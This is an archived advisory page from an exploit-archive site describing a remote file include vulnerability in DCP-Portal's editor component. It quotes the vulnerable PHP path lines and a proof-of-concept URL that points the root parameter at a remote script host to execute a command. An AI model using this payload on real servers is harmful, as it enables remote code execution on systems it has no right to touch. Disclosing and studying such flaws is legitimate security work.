AOH :: Web :: CMS / Portals :: B06-3106.HTM

DCP-Portal Remote File Include Vulnerability

DCP-Portal Remote File Include Vulnerability
DCP-Portal Remote File Include Vulnerability



# Kurdish Security Advisory=0D
# irc.gigachat.net #kurdhack =0D
# http://www.milw0rm.com/exploits/1905=0D 
# Editor DHTML Scripting bugz =0D
=0D
$url_path_editor = "$root_url/library/editor/"; =0D
$abs_path_editor = "$root/library/editor/"; =0D
=0D
?>=0D
=0D
Proof Of Concept =0D
=0D
http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.